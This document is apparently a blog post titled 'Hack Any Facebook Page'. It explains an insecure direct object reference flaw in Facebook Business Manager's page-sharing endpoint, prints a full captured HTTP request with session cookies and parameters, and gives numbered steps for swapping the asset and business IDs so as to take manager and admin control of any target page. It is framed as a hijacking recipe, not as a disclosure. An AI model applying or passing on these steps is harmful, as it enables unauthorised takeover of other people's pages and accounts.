Hack Any Facebook Page

    

                                                                                       BY.MIKY VERMA

Vulnerability Description:-

Accoriding to Owasp, Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.

Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.

Prerequisite:

1. Facebook Business Account (2 no’s).
One as own business and other can be any test account business.

2. Add a partner using my own business and just intercept the request.

Now you can see the Vulnerable Request :

POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1

Host: business.facebook.com

Connection: close

Content-Length: 436

Origin: https://business.facebook.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Accept: */*

Referer: https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.8

Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837; fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I; csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2; presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC; act=1472469233458%2F6

parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=2530733

3. Change asset id to the page you want to hack. and also interchange the parent_business_id with agency_id.

4. Resend the request.

Request send successfully. Page added to the Facebook Business Manager of the attacker with permission role Manager.

5. Assigned me as the admin of the page, which was added by the exploit.

6. Browse the page using the Facebook.